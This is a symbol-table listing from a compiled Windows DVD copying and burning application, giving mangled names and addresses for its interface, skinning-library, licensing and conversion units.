                                                                                                                      @$xp$26Spagecontrol@TsTabSkinData17080x609ff8
                                                                                                                      @$xp$26Sradiobutton@TsRadioButton18440x614bd0
                                                                                                                      @$xp$26Sskinmanager@TacBtnEffects19090x6190bc
                                                                                                                      @$xp$26Sskinmanager@TacDialogShow19190x619584
                                                                                                                      @$xp$26Sskinmanager@TacPageChange19170x6194ac
                                                                                                                      @$xp$26Sskinmanager@TacSkinPlaces19050x618e90
                                                                                                                      @$xp$26Sskinmanager@TsSkinGeneral19250x619e18
                                                                                                                      @$xp$26Sskinmanager@TsSkinManager19460x61cdb0
                                                                                                                      @$xp$26Sskinmanager@TsSkinPattern19310x61ab38
                                                                                                                      @$xp$26Sskinmanager@TsStoredSkins19390x61b5f0
                                                                                                                      @$xp$26Sskinmenus@TsSkinableMenus21170x62f028
                                                                                                                      @$xp$26Sskinprovider@TacGraphItem21680x6339c8
                                                                                                                      @$xp$26Sskinprovider@TacNCHitTest21720x633c54
                                                                                                                      @$xp$26Sskinprovider@TsResizeMode21740x633cdc
                                                                                                                      @$xp$26Sskinprovider@TsSystemMenu22000x636cb0
                                                                                                                      @$xp$26Sspeedbutton@TsSpeedButton24320x64e514
                                                                                                                      @$xp$26Stooledit@TsCustomDateEdit27150x661b28
                                                                                                                      @$xp$26Zlibex@TZCompressionStream39060x6bc794
                                                                                                                      @$xp$27Acsbutils@TacPageControlWnd31490x679da0
                                                                                                                      @$xp$27Acshellctrls@TacShellFolder36390x6a4bb8
                                                                                                                      @$xp$27Acskinpack@TacSkinConvertor38850x6b5630
                                                                                                                      @$xp$27Acthdtimer@TacThreadedTimer29560x66b5e4
                                                                                                                      @$xp$27Scomboboxes@TGetColorsEvent7220x5c6b1c
                                                                                                                      @$xp$27Scomboboxes@TsColorBoxStyle7210x5c6b00
                                                                                                                      @$xp$27Slistview@TsHackedListItems15630x6020bc
                                                                                                                      @$xp$27Smonthcalendar@TsCalendGrid16440x606bdc
                                                                                                                      @$xp$27Spagecontrol@TacCloseAction17050x609e24
                                                                                                                      @$xp$27Spopupclndr@TsPopupCalendar18240x614008
                                                                                                                      @$xp$27Sskinmanager@TacAnimEffects19230x6198b8
                                                                                                                      @$xp$27Sskinmanager@ThirdPartyList19410x61b910
                                                                                                                      @$xp$27Sskinmanager@TsSkinGenerals19270x61a448
                                                                                                                      @$xp$27Sskinmanager@TsSkinPatterns19350x61ae84
                                                                                                                      @$xp$27Sskinprovider@TAddItemEvent21710x633bb8
                                                                                                                      @$xp$27Sskinprovider@TacAddedTitle21780x633f10
                                                                                                                      @$xp$27Sskinprovider@TacBorderForm21900x6362f8
                                                                                                                      @$xp$27Sskinprovider@TacGraphItems22020x636d1c
                                                                                                                      @$xp$27Sskinprovider@TsTitleButton21800x6341f4
                                                                                                                      @$xp$27Sspinedit@TsDecimalSpinEdit24890x6532e8
                                                                                                                      @$xp$27Zlibex@EZDecompressionError39150x6bcd64
                                                                                                                      @$xp$28Acpathdialog@TPathDialogForm38180x6b1130
                                                                                                                      @$xp$28Acshellctrls@TacNotifyFilter36400x6a4d48
                                                                                                                      @$xp$28Acshellctrls@TsShellComboBox36570x6a72a0
                                                                                                                      @$xp$28Acshellctrls@TsShellListView36610x6a8680
                                                                                                                      @$xp$28Acshellctrls@TsShellTreeView36530x6a5f70
                                                                                                                      @$xp$28Scomboboxes@TsColorBoxStyles7200x5c6a54
                                                                                                                      @$xp$28Scomboboxes@TsCommonComboBox7190x5c68cc
                                                                                                                      @$xp$28Scomboboxes@TsCustomColorBox7240x5c6e90
                                                                                                                      @$xp$28Sconst@TsHintsPredefinitions11430x5dd5dc
                                                                                                                      @$xp$28Scurrencyedit@TsCurrencyEdit12120x5e0cc4
                                                                                                                      @$xp$28Sdefaults@TacThirdPartyTypes11670x5de630
                                                                                                                      @$xp$28Sdialogs@TsOpenPictureDialog10220x5d915c
                                                                                                                      @$xp$28Sdialogs@TsSavePictureDialog10260x5d93e4
                                                                                                                      @$xp$28Sframeadapter@TsFrameAdapter12690x5e586c
                                                                                                                      @$xp$28Smaskdata@TsGeneralDataArray15910x6046a4
                                                                                                                      @$xp$28Sskinmanager@TacSkinChanging19210x6196ac
                                                                                                                      @$xp$28Sskinmanager@TacSkinningRule19420x61bc98
                                                                                                                      @$xp$28Sskinprovider@TacAdapterItem21700x633b84
                                                                                                                      @$xp$28Sskinprovider@TacCtrlAdapter22040x637264
                                                                                                                      @$xp$28Sskinprovider@TacSBAnimation21880x635c00
                                                                                                                      @$xp$28Sskinprovider@TsSkinProvider21860x635430
                                                                                                                      @$xp$28Sskinprovider@TsTitleButtons21820x634494
                                                                                                                      @$xp$28Sspinedit@TsTimerSpeedButton24930x6536dc
                                                                                                                      @$xp$28Sstylesimply@Sstylesimply__226490x65acb0
                                                                                                                      @$xp$28Zlibex@TZDecompressionStream39080x6bca54
                                                                                                                      @$xp$29Acshellctrls@TacNotifyFilters36410x6a4dd8
                                                                                                                      @$xp$29Acshellctrls@TacShowExtension36340x6a457c
                                                                                                                      @$xp$29Scomboboxes@TsComboBoxStrings7010x5c56e4
                                                                                                                      @$xp$29Scustomcomboedit@TsEditButton10670x5daa38
                                                                                                                      @$xp$29Smonthcalendar@TGetCellParams16420x606690
                                                                                                                      @$xp$29Spagecontrol@TacCloseBtnClick17060x609e64
                                                                                                                      @$xp$29Sskinmanager@TacFormAnimation19110x6191fc
                                                                                                                      @$xp$29Sskinmanager@TacSkinningRules19430x61bcf0
                                                                                                                      @$xp$29Sskinprovider@PsCaptionButton21760x633dcc
                                                                                                                      @$xp$29Sskinprovider@TacAdapterItems22010x636ce0
                                                                                                                      @$xp$29Sskinprovider@TsCaptionButton21750x633d20
                                                                                                                      @$xp$29Sskinprovider@TsCustomSysMenu21920x636598
                                                                                                                      @$xp$30Acalphaimagelist@TsImageFormat35780x6a2128
                                                                                                                      @$xp$30Acalphaimagelist@TsImgListItem35800x6a233c
                                                                                                                      @$xp$30Acsbutils@THeaderPaintElements30770x67428c
                                                                                                                      @$xp$30Acshellctrls@TacAddFolderEvent36480x6a54c8
                                                                                                                      @$xp$30Scolordialog@TsColorDialogForm38310x6b2fb8
                                                                                                                      @$xp$30Scomboboxes@TsCustomComboBoxEx7320x5c840c
                                                                                                                      @$xp$30Scustomcomboedit@TCloseUpEvent10650x5da6c8
                                                                                                                      @$xp$30Smonthcalendar@TsMonthCalendar16460x6071f8
                                                                                                                      @$xp$30Sskinmanager@_TsSkinManager@_119440x61bd10
                                                                                                                      @$xp$30Sstylesimply@TConstantSkinData26480x65a508
                                                                                                                      @$xp$30Stooledit@TExecOpenDialogEvent27010x66078c
                                                                                                                      @$xp$31Acalphaimagelist@TsImgListItems35820x6a24f0
                                                                                                                      @$xp$31Acsbutils@TacSpeedButtonHandler30850x674bf4
                                                                                                                      @$xp$31Acsbutils@TacVirtualTreeViewWnd31410x679120
                                                                                                                      @$xp$31Acshellctrls@TacShellObjectType36320x6a4508
                                                                                                                      @$xp$31Acshellctrls@TsDlgShellListView36630x6a9274
                                                                                                                      @$xp$31Scomboboxes@TsCustomListControl7030x5c5b64
                                                                                                                      @$xp$31Sgroupbox@TacIndexChangingEvent12830x5e74ec
                                                                                                                      @$xp$31Sspeedbutton@TsTimerSpeedButton24340x64ea7c
                                                                                                                      @$xp$32Acshellctrls@IacShellCommandVerb36350x6a45c8
                                                                                                                      @$xp$32Acshellctrls@TacShellObjectTypes36330x6a455c
                                                                                                                      @$xp$32Sskinmanager@TacGetExtraLineData19060x618ee4
                                                                                                                      @$xp$33Acalphaimagelist@TsAlphaImageList35840x6a296c
                                                                                                                      @$xp$33Acshellctrls@TacShellChangeThread36430x6a5050
                                                                                                                      @$xp$34Acshellctrls@TacGetImageIndexEvent36490x6a5560
                                                                                                                      @$xp$34Scustomcomboedit@TsCustomComboEdit10690x5daf68
                                                                                                                      @$xp$35Acsbutils@PAdvancedHeaderPaintEvent30800x67442c
                                                                                                                      @$xp$35Acsbutils@TAdvancedHeaderPaintEvent30780x6742b0
                                                                                                                      @$xp$35Acshellctrls@TacCustomShellComboBox36550x6a6f1c
                                                                                                                      @$xp$35Acshellctrls@TacCustomShellListView36590x6a81d8
                                                                                                                      @$xp$35Acshellctrls@TacCustomShellTreeView36510x6a5b94
                                                                                                                      @$xp$35Acshellctrls@TacShellChangeNotifier36470x6a53e0
                                                                                                                      @$xp$35Acshellctrls@TacShellFolderProperty36300x6a444c
                                                                                                                      @$xp$35Scomboboxes@TsCustomComboBoxStrings6980x5c5504
                                                                                                                      @$xp$37Acshellctrls@TacShellFolderCapability36280x6a4398
                                                                                                                      @$xp$37Acshellctrls@TacShellFolderProperties36310x6a44e0
                                                                                                                      @$xp$37Sskinmenus@TsMenuManagerDrawItemEvent21110x62e424
                                                                                                                      @$xp$39Acshellctrls@TacShellFolderCapabilities36290x6a4424
                                                                                                                      @$xp$40Acsbutils@PHeaderPaintQueryElementsEvent30810x674454
                                                                                                                      @$xp$40Acsbutils@THeaderPaintQueryElementsEvent30790x67436c
                                                                                                                      @$xp$40Scomboboxes@TsCustomComboBoxStringsClass6990x5c5540
                                                                                                                      @$xp$41Acshellctrls@TacCustomShellChangeNotifier36450x6a5250
                                                                                                                      @$xp$8TMyClock1920x592fd8
                                                                                                                      @$xp$9TMyButton1200x59063c
                                                                                                                      @$xp$ynpqqro$v1700x592520
                                                                                                                      @@Aboutdialogunit@Finalize130x42366c
                                                                                                                      @@Aboutdialogunit@Initialize120x42365c
                                                                                                                      @@Addisomounterunit@Finalize370x4301f8
                                                                                                                      @@Addisomounterunit@Initialize360x4301e8
                                                                                                                      @@Baseframeunit@Finalize390x43039c
                                                                                                                      @@Baseframeunit@Initialize380x43038c
                                                                                                                      @@Burnfolderunit@Finalize410x4303bc
                                                                                                                      @@Burnfolderunit@Initialize400x4303ac
                                                                                                                      @@Burniniterror@Finalize1170x46635c
                                                                                                                      @@Burniniterror@Initialize1160x46634c
                                                                                                                      @@Burnisounit@Finalize430x4303dc
                                                                                                                      @@Burnisounit@Initialize420x4303cc
                                                                                                                      @@Burnnerprogressunit@Finalize450x431748
                                                                                                                      @@Burnnerprogressunit@Initialize440x431738
                                                                                                                      @@Burnnersettingunit@Finalize470x432a2c
                                                                                                                      @@Burnnersettingunit@Initialize460x432a1c
                                                                                                                      @@Burnningprogressunit@Finalize850x44e508
                                                                                                                      @@Burnningprogressunit@Initialize840x44e4f8
                                                                                                                      @@Changedischintunit@Finalize490x432fc8
                                                                                                                      @@Changedischintunit@Initialize480x432fb8
                                                                                                                      @@Chapterbackupunit@Finalize510x4358f0
                                                                                                                      @@Chapterbackupunit@Initialize500x4358e0
                                                                                                                      @@Checkupgradethread@Finalize70x405920
                                                                                                                      @@Checkupgradethread@Initialize60x405910
                                                                                                                      @@Checkupgradeunit@Finalize170x4241e8
                                                                                                                      @@Checkupgradeunit@Initialize160x4241d8
                                                                                                                      @@Commandlinearguments@Finalize39870x926354
                                                                                                                      @@Commandlinearguments@Initialize39860x926344
                                                                                                                      @@Configurefileunit@Finalize39690x8e90f0
                                                                                                                      @@Configurefileunit@Initialize39680x8e90e0
                                                                                                                      @@Converteredsizeunit@Finalize530x436d98
                                                                                                                      @@Converteredsizeunit@Initialize520x436d88
                                                                                                                      @@Convertprogressunit@Finalize550x438250
                                                                                                                      @@Convertprogressunit@Initialize540x438240
                                                                                                                      @@Copychapterprogressunit@Finalize870x44f670
                                                                                                                      @@Copychapterprogressunit@Initialize860x44f660
                                                                                                                      @@Copyjobprogressunit@Finalize890x44fd40
                                                                                                                      @@Copyjobprogressunit@Initialize880x44fd30
                                                                                                                      @@Copytodvdunit@Finalize570x438270
                                                                                                                      @@Copytodvdunit@Initialize560x438260
                                                                                                                      @@Copytompeg2unit@Finalize590x43a3cc
                                                                                                                      @@Copytompeg2unit@Initialize580x43a3bc
                                                                                                                      @@Copytompegprogressunit@Finalize910x44fe54
                                                                                                                      @@Copytompegprogressunit@Initialize900x44fe44
                                                                                                                      @@Createlistbox@Finalize90x40e9bc
                                                                                                                      @@Createlistbox@Initialize80x40e9a4
                                                                                                                      @@Datacenter@Finalize110x4228e4
                                                                                                                      @@Datacenter@Initialize100x4228d4
                                                                                                                      @@Debugunit@Finalize39890x926654
                                                                                                                      @@Debugunit@Initialize39880x926644
                                                                                                                      @@Dialogbaseunit@Finalize190x4242e4
                                                                                                                      @@Dialogbaseunit@Initialize180x4242d4
                                                                                                                      @@Dvd_player_interface@Finalize39930x927154
                                                                                                                      @@Dvd_player_interface@Initialize39920x927144
                                                                                                                      @@Dvdbackupfunctionunit@Finalize330x42fe44
                                                                                                                      @@Dvdbackupfunctionunit@Initialize320x42fe2c
                                                                                                                      @@Dvdburnerunit@Finalize610x43f358
                                                                                                                      @@Dvdburnerunit@Initialize600x43f348
                                                                                                                      @@Dvdconvertinterface@Finalize39850x91e8a4
                                                                                                                      @@Dvdconvertinterface@Initialize39840x91e894
                                                                                                                      @@Dvdcreatorunit@Finalize630x43f378
                                                                                                                      @@Dvdcreatorunit@Initialize620x43f368
                                                                                                                      @@Dvdtitleconverterinterface@Finalize39830x91dba4
                                                                                                                      @@Dvdtitleconverterinterface@Initialize39820x91db94
                                                                                                                      @@Dvdtodvdprogressunit@Finalize930x451688
                                                                                                                      @@Dvdtodvdprogressunit@Initialize920x451678
                                                                                                                      @@Dvdtodvdunit@Finalize650x441f98
                                                                                                                      @@Dvdtodvdunit@Initialize640x441f88
                                                                                                                      @@Dvdtofolderprogressunit@Finalize950x452174
                                                                                                                      @@Dvdtofolderprogressunit@Initialize940x452164
                                                                                                                      @@Dvdtofolderunit@Finalize670x442b08
                                                                                                                      @@Dvdtofolderunit@Initialize660x442af8
                                                                                                                      @@Dvdtoisoprogressunit@Finalize970x4527cc
                                                                                                                      @@Dvdtoisoprogressunit@Initialize960x4527bc
                                                                                                                      @@Dvdtoisounit@Finalize690x443a14
                                                                                                                      @@Dvdtoisounit@Initialize680x443a04
                                                                                                                      @@Exceptionhandling@Finalize350x42fe6c
                                                                                                                      @@Exceptionhandling@Initialize340x42fe5c
                                                                                                                      @@Exeversioninfo@Finalize39810x90ad1c
                                                                                                                      @@Exeversioninfo@Initialize39800x90ad04
                                                                                                                      @@Extractaudioprogressunit@Finalize990x4528e0
                                                                                                                      @@Extractaudioprogressunit@Initialize980x4528d0
                                                                                                                      @@Extractaudiounit@Finalize710x445c78
                                                                                                                      @@Extractaudiounit@Initialize700x445c68
                                                                                                                      @@Extractsubtitleunit@Finalize730x445c98
                                                                                                                      @@Extractsubtitleunit@Initialize720x445c88
                                                                                                                      @@Extractvideoprogressunit@Finalize1010x4529f4
                                                                                                                      @@Extractvideoprogressunit@Initialize1000x4529e4
                                                                                                                      @@Extractvideounit@Finalize750x447474
                                                                                                                      @@Extractvideounit@Initialize740x447464
                                                                                                                      @@Fileoperation@Finalize39630x8ccae0
                                                                                                                      @@Fileoperation@Initialize39620x8ccad0
                                                                                                                      @@Fulldvdbackup@Finalize770x4480d4
                                                                                                                      @@Fulldvdbackup@Initialize760x4480c4
                                                                                                                      @@Functionunit@Finalize39610x8c9c88
                                                                                                                      @@Functionunit@Initialize39600x8c9c78
                                                                                                                      @@Getmovieinfo@Finalize39770x90a3b8
                                                                                                                      @@Getmovieinfo@Initialize39760x90a3a8
                                                                                                                      @@Getmovieinfothread@Finalize39790x90a54c
                                                                                                                      @@Getmovieinfothread@Initialize39780x90a53c
                                                                                                                      @@Imagemounterunit@Finalize790x4480f4
                                                                                                                      @@Imagemounterunit@Initialize780x4480e4
                                                                                                                      @@Inifileunit@Finalize39710x900b74
                                                                                                                      @@Inifileunit@Initialize39700x900b64
                                                                                                                      @@Installkb932716@Finalize210x424928
                                                                                                                      @@Installkb932716@Initialize200x424918
                                                                                                                      @@Jobprogress@Finalize1030x452ae8
                                                                                                                      @@Jobprogress@Initialize1020x452ad8
                                                                                                                      @@Languagelist@Finalize39730x901bd4
                                                                                                                      @@Languagelist@Initialize39720x901bc4
                                                                                                                      @@Lastestversionunit@Finalize230x4257e8
                                                                                                                      @@Lastestversionunit@Initialize220x4257d8
                                                                                                                      @@Licenseerror@Finalize150x423eb4
                                                                                                                      @@Licenseerror@Initialize140x423ea4
                                                                                                                      @@Loadbluray@Finalize39670x8e3cb8
                                                                                                                      @@Loadbluray@Initialize39660x8e3ca0
                                                                                                                      @@Loaddvd@Finalize39650x8e32f0
                                                                                                                      @@Loaddvd@Initialize39640x8e32e0
                                                                                                                      @@Mainunit@Finalize1050x45c29c
                                                                                                                      @@Mainunit@Initialize1040x45c28c
                                                                                                                      @@Messagecenter@Finalize1070x4605c8
                                                                                                                      @@Messagecenter@Initialize1060x4605b8
                                                                                                                      @@Multilanguageunit@Finalize39750x903e30
                                                                                                                      @@Multilanguageunit@Initialize39740x903e20
                                                                                                                      @@Mybutton@Finalize1220x590a24
                                                                                                                      @@Mybutton@Initialize1210x590a14
                                                                                                                      @@Mychangebutton@Finalize1550x591d50
                                                                                                                      @@Mychangebutton@Initialize1540x591d40
                                                                                                                      @@Mycheckbox@Finalize1720x592544
                                                                                                                      @@Mycheckbox@Initialize1710x592534
                                                                                                                      @@Myclock@Finalize1940x593200
                                                                                                                      @@Myclock@Initialize1930x5931f0
                                                                                                                      @@Mycustombutton@Finalize1960x593b04
                                                                                                                      @@Mycustombutton@Initialize1950x593af4
                                                                                                                      @@Mycustomscrollbar@Finalize1980x593b24
                                                                                                                      @@Mycustomscrollbar@Initialize1970x593b14
                                                                                                                      @@Mycustomtrackbar@Finalize2000x594414
                                                                                                                      @@Mycustomtrackbar@Initialize1990x594404
                                                                                                                      @@Mydropdownbutton@Finalize2270x59a184
                                                                                                                      @@Mydropdownbutton@Initialize2260x59a174
                                                                                                                      @@Mydvdlistbox@Finalize2690x59e2fc
                                                                                                                      @@Mydvdlistbox@Initialize2680x59e2ec
                                                                                                                      @@Myframelist@Finalize2940x5a11d4
                                                                                                                      @@Myframelist@Initialize2930x5a11c4
                                                                                                                      @@Myiconlist@Finalize3140x5a3af0
                                                                                                                      @@Myiconlist@Initialize3130x5a3ae0
                                                                                                                      @@Mylistview@Finalize3770x5ae274
                                                                                                                      @@Mylistview@Initialize3760x5ae264
                                                                                                                      @@Mynoticeboard@Finalize3970x5aee98
                                                                                                                      @@Mynoticeboard@Initialize3960x5aee88
                                                                                                                      @@Myplayerevent@Finalize39910x926914
                                                                                                                      @@Myplayerevent@Initialize39900x926904
                                                                                                                      @@Myplayerprogress@Finalize4180x5afa34
                                                                                                                      @@Myplayerprogress@Initialize4170x5afa24
                                                                                                                      @@Myprogressbar@Finalize4320x5b0134
                                                                                                                      @@Myprogressbar@Initialize4310x5b0124
                                                                                                                      @@Mytrackbar@Finalize4370x5b046c
                                                                                                                      @@Mytrackbar@Initialize4360x5b045c
                                                                                                                      @@Myvariablepanel@Finalize4530x5b0fac
                                                                                                                      @@Myvariablepanel@Initialize4520x5b0f9c
                                                                                                                      @@Myvideocapture@Finalize4850x5b28d0
                                                                                                                      @@Myvideocapture@Initialize4840x5b28c0
                                                                                                                      @@Myvolumebar@Finalize4960x5b2ce8
                                                                                                                      @@Myvolumebar@Initialize4950x5b2cd8
                                                                                                                      @@Pngunit@Finalize30x403314
                                                                                                                      @@Pngunit@Initialize20x403304
                                                                                                                      @@Progressunit@Finalize250x425a24
                                                                                                                      @@Progressunit@Initialize240x425a14
                                                                                                                      @@Publicunit@Finalize4980x5b2da0
                                                                                                                      @@Publicunit@Initialize4970x5b2d90
                                                                                                                      @@Registchangemessage@Finalize1090x4609a8
                                                                                                                      @@Registchangemessage@Initialize1080x460998
                                                                                                                      @@Registdialogunit@Finalize270x42770c
                                                                                                                      @@Registdialogunit@Initialize260x4276fc
                                                                                                                      @@Selectedvdunit@Finalize810x449864
                                                                                                                      @@Selectedvdunit@Initialize800x449854
                                                                                                                      @@Showregisterunit@Finalize290x428c10
                                                                                                                      @@Showregisterunit@Initialize280x428c00
                                                                                                                      @@Systemunit@Finalize1110x460edc
                                                                                                                      @@Systemunit@Initialize1100x460ecc
                                                                                                                      @@Taesencoder@Finalize39550x8a370c
                                                                                                                      @@Taesencoder@Initialize39540x8a36fc
                                                                                                                      @@Toolisomounterunit@Finalize830x44d9a8
                                                                                                                      @@Toolisomounterunit@Initialize820x44d998
                                                                                                                      @@Trsaencoder@Finalize39570x8c802c
                                                                                                                      @@Trsaencoder@Initialize39560x8c801c
                                                                                                                      @@Upgradeversionunit@Finalize310x4296a4
                                                                                                                      @@Upgradeversionunit@Initialize300x429694
                                                                                                                      @@Usermessageunit@Finalize1130x46189c
                                                                                                                      @@Usermessageunit@Initialize1120x46188c
                                                                                                                      @@Utf8inifile@Finalize1150x46595c
                                                                                                                      @@Utf8inifile@Initialize1140x465944
                                                                                                                      @@Variableunit@Finalize50x4037fc
                                                                                                                      @@Variableunit@Initialize40x4037ec
                                                                                                                      @@Verify@Finalize39590x8c8b04
                                                                                                                      @@Verify@Initialize39580x8c8af4
                                                                                                                      @Acalphaimagelist@AddImageFromRes$qqruip33Acalphaimagelist@TsAlphaImageListx20System@UnicodeString30Acalphaimagelist@TsImageFormat35890x6a2e4c
                                                                                                                      @Acalphaimagelist@DrawAlphaImgList$qqrpx24Imglist@TCustomImageListpx16Graphics@TBitmapxixixixix15Graphics@TColorixixo35860x6a2ae8
                                                                                                                      @Acalphaimagelist@DrawAlphaImgListDC$qqrpx24Imglist@TCustomImageListxp5HDC__xixixixix15Graphics@TColorxixixo35870x6a2cac
                                                                                                                      @Acalphaimagelist@Finalization$qqrv36250x6a422c
                                                                                                                      @Acalphaimagelist@GetImageFormat$qqrx20System@UnicodeStringr30Acalphaimagelist@TsImageFormat35850x6a2a1c
                                                                                                                      @Acalphaimagelist@HaveMagic$qqrx20System@UnicodeStringpxvxi35880x6a2d7c
                                                                                                                      @Acalphaimagelist@TsAlphaImageList@35830x6a257c
                                                                                                                      @Acalphaimagelist@TsAlphaImageList@$bctr$qqrp18Classes@TComponent35940x6a3264
                                                                                                                      @Acalphaimagelist@TsAlphaImageList@$bdtr$qqrv35960x6a32e0
                                                                                                                      @Acalphaimagelist@TsAlphaImageList@AcBeginUpdate$qqrv36110x6a4040
                                                                                                                      @Acalphaimagelist@TsAlphaImageList@AcEndUpdate$qqro36120x6a4048
                                                                                                                      @Acalphaimagelist@TsAlphaImageList@AfterConstruction$qqrv35900x6a2f44
                                                                                                                      @Acalphaimagelist@TsAlphaImageList@Assign$qqrp19Classes@TPersistent35910x6a2f98
                                                                                                                      @Acalphaimagelist@TsAlphaImageList@AssignTo$qqrp19Classes@TPersistent35920x6a3074
                                                                                                                      @Acalphaimagelist@TsAlphaImageList@Change$qqrv36100x6a3dec
                                                                                                                      @Acalphaimagelist@TsAlphaImageList@CopyImages$qqrpx33Acalphaimagelist@TsAlphaImageList35930x6a3144
                                                                                                                      @Acalphaimagelist@TsAlphaImageList@CreateImgList$qqrv35950x6a32b4
                                                                                                                      @Acalphaimagelist@TsAlphaImageList@DoDraw$qqrip16Graphics@TCanvasiiuio35970x6a3310
                                                                                                                      @Acalphaimagelist@TsAlphaImageList@GenerateStdList$qqrv35980x6a34b8
                                                                                                                      @Acalphaimagelist@TsAlphaImageList@GetBitmap32$qqrip16Graphics@TBitmap35990x6a379c
                                                                                                                      @Acalphaimagelist@TsAlphaImageList@IsDuplicated$qqrv36000x6a39b8
                                                                                                                      @Acalphaimagelist@TsAlphaImageList@ItemsClear$qqrv36090x6a3db4
                                                                                                                      @Acalphaimagelist@TsAlphaImageList@KillImgList$qqrv36010x6a39d0
                                                                                                                      @Acalphaimagelist@TsAlphaImageList@LoadFromFile$qqrx20System@UnicodeString36030x6a3a44
                                                                                                                      @Acalphaimagelist@TsAlphaImageList@Loaded$qqrv36020x6a3a0c
                                                                                                                      @Acalphaimagelist@TsAlphaImageList@ReadData$qqrp15Classes@TStream36040x6a3b50
                                                                                                                      @Acalphaimagelist@TsAlphaImageList@SetItems$qqrpx31Acalphaimagelist@TsImgListItems36060x6a3b58
                                                                                                                      @Acalphaimagelist@TsAlphaImageList@SetNewDimensions$qqrui36070x6a3b68
                                                                                                                      @Acalphaimagelist@TsAlphaImageList@TryLoadFromFile$qqrx20System@UnicodeString36080x6a3ba0
                                                                                                                      @Acalphaimagelist@TsAlphaImageList@WriteData$qqrp15Classes@TStream36050x6a3b54
                                                                                                                      @Acalphaimagelist@TsImgListItem@35790x6a21bc
                                                                                                                      @Acalphaimagelist@TsImgListItem@$bctr$qqrp19Classes@TCollection36200x6a4148
                                                                                                                      @Acalphaimagelist@TsImgListItem@$bdtr$qqrv36220x6a41e4
                                                                                                                      @Acalphaimagelist@TsImgListItem@Assign$qqrp19Classes@TPersistent36180x6a40f0
                                                                                                                      @Acalphaimagelist@TsImgListItem@AssignTo$qqrp19Classes@TPersistent36190x6a411c
                                                                                                                      @Acalphaimagelist@TsImgListItem@DefineProperties$qqrp14Classes@TFiler36210x6a419c
                                                                                                                      @Acalphaimagelist@TsImgListItem@ReadData$qqrp15Classes@TStream36230x6a4214
                                                                                                                      @Acalphaimagelist@TsImgListItem@WriteData$qqrp15Classes@TStream36240x6a4220
                                                                                                                      @Acalphaimagelist@TsImgListItems@35810x6a2420
                                                                                                                      @Acalphaimagelist@TsImgListItems@$bctr$qqrp33Acalphaimagelist@TsAlphaImageList36130x6a4060
                                                                                                                      @Acalphaimagelist@TsImgListItems@$bdtr$qqrv36140x6a40a4
                                                                                                                      @Acalphaimagelist@TsImgListItems@GetItem$qqri36150x6a40d0
                                                                                                                      @Acalphaimagelist@TsImgListItems@GetOwner$qqrv36160x6a40e4
                                                                                                                      @Acalphaimagelist@TsImgListItems@SetItem$qqrip30Acalphaimagelist@TsImgListItem36170x6a40e8
                                                                                                                      @Acalphaimagelist@initialization$qqrv36260x6a4234
                                                                                                                      @Acdials@AddSupportedForm$qqruip16tagCREATESTRUCTW29840x66d4c8
                                                                                                                      @Acdials@BroadCastHwnd$qqrxp6HWND__rx17Messages@TMessage29800x66d16c
                                                                                                                      @Acdials@CleanArray$qqrv30710x673f6c
                                                                                                                      @Acdials@ClearMnuArray$qqrv30700x673f14
                                                                                                                      @Acdials@ControlExists$qqrp6HWND__x20System@UnicodeString29820x66d1fc
                                                                                                                      @Acdials@DlgLeft40640x956b40
                                                                                                                      @Acdials@DlgTop40650x956b44
                                                                                                                      @Acdials@DrawAppIcon$qqrp20Acdials@TacDialogWnd29970x66e7d4
                                                                                                                      @Acdials@FillArOR$qqrp20Acdials@TacDialogWnd29990x66e9d8
                                                                                                                      @Acdials@Finalization$qqrv30720x673fdc
                                                                                                                      @Acdials@FindFormInList$qqrui29860x66d844
                                                                                                                      @Acdials@FindFormOnScreen$qqrui29870x66d880
                                                                                                                      @Acdials@GetRgnFromArOR$qqrp20Acdials@TacDialogWndii30010x66ec20
                                                                                                                      @Acdials@GetWndClassName$qqrui29850x66d818
                                                                                                                      @Acdials@GetWndText$qqrui29980x66e910
                                                                                                                      @Acdials@HookCallback42260x9c9ad4
                                                                                                                      @Acdials@InitDialog$qqruirp20Acdials@TacDialogWnd29960x66e720
                                                                                                                      @Acdials@MnuArray42310x9c9af4
                                                                                                                      @Acdials@SkinHookCBT$qqsiii29830x66d294
                                                                                                                      @Acdials@TacDialogWnd@29750x66bf44
                                                                                                                      @Acdials@TacDialogWnd@$bctr$qqrp6HWND__p24Scommondata@TsCommonDatap26Sskinmanager@TsSkinManagerx20System@UnicodeStringo30050x66fca8
                                                                                                                      @Acdials@TacDialogWnd@$bdtr$qqrv30060x66fdb0
                                                                                                                      @Acdials@TacDialogWnd@AboveBorder$qqrrx21Messages@TWMNCHitTest30400x672c64
                                                                                                                      @Acdials@TacDialogWnd@Ac_DrawStaticItem$qqrr20Messages@TWMDrawItem30480x6737f0
                                                                                                                      @Acdials@TacDialogWnd@Ac_WMActivate$qqrr17Messages@TMessage30470x6737c0
                                                                                                                      @Acdials@TacDialogWnd@Ac_WMLButtonUp$qqrr17Messages@TMessage30450x673574
                                                                                                                      @Acdials@TacDialogWnd@Ac_WMNCActivate$qqrr17Messages@TMessage30460x6737a4
                                                                                                                      @Acdials@TacDialogWnd@Ac_WMNCHitTest$qqrr17Messages@TMessage30360x6726a0
                                                                                                                      @Acdials@TacDialogWnd@Ac_WMNCLButtonDown$qqrr24Messages@TWMNCHitMessage30420x673340
                                                                                                                      @Acdials@TacDialogWnd@Ac_WMNCPaint$qqrr17Messages@TMessage30280x671e70
                                                                                                                      @Acdials@TacDialogWnd@Ac_WMPaint$qqrr17Messages@TWMPaint30070x66fe5c
                                                                                                                      @Acdials@TacDialogWnd@AdapterRemove$qqrv30330x6725fc
                                                                                                                      @Acdials@TacDialogWnd@BarWidth$qqri30030x66fbbc
                                                                                                                      @Acdials@TacDialogWnd@BorderHeight$qqrv30300x672110
                                                                                                                      @Acdials@TacDialogWnd@ButtonHeight$qqri30320x672588
                                                                                                                      @Acdials@TacDialogWnd@CaptionHeight$qqro30040x66fc38
                                                                                                                      @Acdials@TacDialogWnd@CursorToPoint$qqrii30390x672c1c
                                                                                                                      @Acdials@TacDialogWnd@DropSysMenu$qqrii30440x673548
                                                                                                                      @Acdials@TacDialogWnd@EnabledClose$qqrv30080x66ff10
                                                                                                                      @Acdials@TacDialogWnd@EnabledMax$qqrv30090x66ff40
                                                                                                                      @Acdials@TacDialogWnd@EnabledMin$qqrv30100x66ff78
                                                                                                                      @Acdials@TacDialogWnd@EnabledRestore$qqrv30110x66ff9c
                                                                                                                      @Acdials@TacDialogWnd@FormActive$qqrv30120x66ffcc
                                                                                                                      @Acdials@TacDialogWnd@HTProcess$qqrr21Messages@TWMNCHitTest30370x6727dc
                                                                                                                      @Acdials@TacDialogWnd@HeaderHeight$qqrv30130x66ffd4
